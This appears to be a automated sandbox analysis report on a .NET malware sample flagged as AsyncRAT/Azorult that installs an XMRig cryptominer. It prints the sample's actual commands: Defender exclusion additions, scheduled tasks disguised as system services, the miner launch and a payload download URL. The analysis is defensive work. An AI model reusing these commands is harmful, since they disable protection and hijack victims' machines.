Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 4, 2023, 5:14 p.m.	April 4, 2023, 5:23 p.m.

Size	62.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`09a29f3b529c5e9ab25a47973bb0900a`
SHA256	`33035a718f5445742b82707f0ba6aff80337cac1e89b6b3b8b51177c7f9f578a`
CRC32	`876A7954`
ssdeep	`1536:s2JbaiIZApuLzOgkx9MbEze4g3ViceSITKdU:dbahZApuL1kx9MbEze4g3ViceYO`
Yara	Generic_Malware_Zero - Generic Malware ConfuserEx_Zero - Confuser .NET Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT IsPE32 - (no description) PE_Header_Zero - PE File Signature

SystemUpdate.exe "C:\Users\test22\AppData\Local\Temp\SystemUpdate.exe"
2540
- cmd.exe "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
  2784
  - chcp.com chcp 1251
    2840
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
    2884
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost"
    2988
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
    3068
- dllhost.exe "C:\ProgramData\Dllhost\dllhost.exe"
  148
  - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
    2208
    - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      2404
  - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
    2500
    - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      2576
  - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
    2664
    - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      2796
  - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
    2896
    - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      2944
  - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
    3064
    - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      1152
  - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
    2836
    - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      1304
  - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
    1512
    - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      2136
  - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
    2292
    - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      2244
  - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk6961" /TR "C:\ProgramData\Dllhost\dllhost.exe"
    2536
    - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk6961" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      2648
  - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk230" /TR "C:\ProgramData\Dllhost\dllhost.exe"
    2824
    - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk230" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      2936
  - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk2020" /TR "C:\ProgramData\Dllhost\dllhost.exe"
    3028
    - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk2020" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      300
  - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk2511" /TR "C:\ProgramData\Dllhost\dllhost.exe"
    452
  - cmd.exe "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    2788
    - chcp.com chcp 1251
      2756
  - cmd.exe "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    936
    - chcp.com chcp 1251
      2612
    - winlogson.exe C:\ProgramData\Dllhost\winlogson.exe -c config.json
      2080

Name	Response	Post-Analysis Lookup
bitbucket.org	A 104.192.141.1	104.192.141.1
bbuseruploads.s3.amazonaws.com	A 3.5.3.139 A 52.216.140.148 A 52.216.166.35 CNAME s3-1-w.amazonaws.com A 52.216.178.171 A 52.217.109.220 A 52.216.90.20 CNAME s3-w.us-east-1.amazonaws.com A 52.216.51.81 A 52.216.109.219 A 52.217.198.206 A 52.216.56.97 A 3.5.29.124 A 52.217.50.36 A 54.231.131.201 A 52.217.33.180 A 52.217.170.121 A 52.217.134.57	3.5.3.112
xmr-eu2.nanopool.org	A 152.228.216.245 A 51.15.55.100 A 51.15.67.17 A 92.222.217.165 A 51.15.55.162 A 51.255.34.80	92.222.217.165

IP Address	Status	Action
104.192.141.1	Active	Moloch
152.228.216.245	Active	Moloch
164.124.101.2	Active	Moloch
52.216.140.148	Active	Moloch
52.217.50.36	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49169 -> 104.192.141.1:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49198 -> 104.192.141.1:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49199 -> 52.216.140.148:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49171 -> 52.217.50.36:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:55146 -> 164.124.101.2:53	2033268	ET POLICY Observed DNS Query to Coin Mining Domain (nanopool .org)	Potential Corporate Privacy Violation

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.101:49169 104.192.141.1:443	C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1	unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org	7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc
TLS 1.2 192.168.56.101:49198 104.192.141.1:443	C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1	unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org	7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc
TLS 1.2 192.168.56.101:49199 52.216.140.148:443	C=US, O=Amazon, OU=Server CA 1B, CN=Amazon	CN=*.s3.amazonaws.com	ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b
TLS 1.2 192.168.56.101:49171 52.217.50.36:443	C=US, O=Amazon, OU=Server CA 1B, CN=Amazon	CN=*.s3.amazonaws.com	ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b
TLS 1.3 192.168.56.101:49204 152.228.216.245:14433	None	None	None

Queries for the computername (33 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 4, 2023, 5:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 4, 2023, 5:08 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (7 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 4, 2023, 5:14 p.m.			0	0
IsDebuggerPresent April 4, 2023, 5:14 p.m.			0	0
IsDebuggerPresent April 4, 2023, 5:14 p.m.			0	0
IsDebuggerPresent April 4, 2023, 5:14 p.m.			0	0
IsDebuggerPresent April 4, 2023, 5:14 p.m.			0	0
IsDebuggerPresent April 4, 2023, 5:14 p.m.			0	0
IsDebuggerPresent April 4, 2023, 5:14 p.m.			0	0

Command line console output was observed (50 out of 167 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: Active code page: 1251 console_handle: 0x00000013	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath $ENV:USERPROFILE\Desktop console_handle: 0x00000053	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\ProgramData\Dllhost console_handle: 0x00000053	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\ProgramData\SystemData console_handle: 0x00000053	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: SUCCESS: The scheduled task "SecurityHealthSystray" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: SUCCESS: The scheduled task "WindowsDefender" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: SUCCESS: The scheduled task "WmiPrvSE" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: SUCCESS: The scheduled task "AntiMalwareServiceExecutable" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: SUCCESS: The scheduled task "dllhost" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: SUCCESS: The scheduled task "MicrosoftEdgeUpd" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: SUCCESS: The scheduled task "OneDriveService" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: SUCCESS: The scheduled task "NvStray" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: SUCCESS: The scheduled task "WindowsDefenderServices\WindowsDefenderServicesService_bk6961" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: SUCCESS: The scheduled task "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk230" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: SUCCESS: The scheduled task "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk2020" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: 'C:\ProgramData\Dllhost\winlogson.exe' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW April 4, 2023, 5:14 p.m.	buffer: Active code page: 1251 console_handle: 0x00000013	1	1
WriteConsoleW April 4, 2023, 5:15 p.m.	buffer: Active code page: 1251 console_handle: 0x00000013	1	1
WriteConsoleW April 4, 2023, 5:08 p.m.	buffer: Huge pages support was successfully enabled, but reboot required to use it console_handle: 0x0000000000000013	1	1
WriteConsoleW April 4, 2023, 5:08 p.m.	buffer: ABOUT console_handle: 0x0000000000000013	1	1
WriteConsoleW April 4, 2023, 5:08 p.m.	buffer: XMRig/6.19.0 console_handle: 0x0000000000000013	1	1
WriteConsoleW April 4, 2023, 5:08 p.m.	buffer: MSVC/2019 console_handle: 0x0000000000000013	1	1
WriteConsoleW April 4, 2023, 5:08 p.m.	buffer: LIBS libuv/1.44.2 OpenSSL/1.1.1s hwloc/2.9.0 console_handle: 0x0000000000000013	1	1
WriteConsoleW April 4, 2023, 5:08 p.m.	buffer: HUGE PAGES console_handle: 0x0000000000000013	1	1
WriteConsoleW April 4, 2023, 5:08 p.m.	buffer: unavailable console_handle: 0x0000000000000013	1	1
WriteConsoleW April 4, 2023, 5:08 p.m.	buffer: 1GB PAGES console_handle: 0x0000000000000013	1	1
WriteConsoleW April 4, 2023, 5:08 p.m.	buffer: unavailable console_handle: 0x0000000000000013	1	1
WriteConsoleW April 4, 2023, 5:08 p.m.	buffer: CPU Intel(R) Core(TM) i5-8400 CPU @ 2.80GHz (1) console_handle: 0x0000000000000013	1	1
WriteConsoleW April 4, 2023, 5:08 p.m.	buffer: 64-bit console_handle: 0x0000000000000013	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 138 events)

Time & API	Arguments	Status	Return
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e07c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e07c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e07c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0340 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0340 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0340 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0340 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0340 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0340 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dfe00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dfe00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dfe00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e07c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e07c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e07c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e06c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e07c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e07c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e07c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e07c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e07c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e07c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e07c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dff40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dff40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dff40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dff40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dff40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dff40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dff40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dff40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dff40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dff40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dff40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dff40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dff40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002dff40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebf30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebf30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebf30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 4, 2023, 5:14 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET https://bitbucket.org/rpoverka/zhopa/downloads/Task24Watch.exe
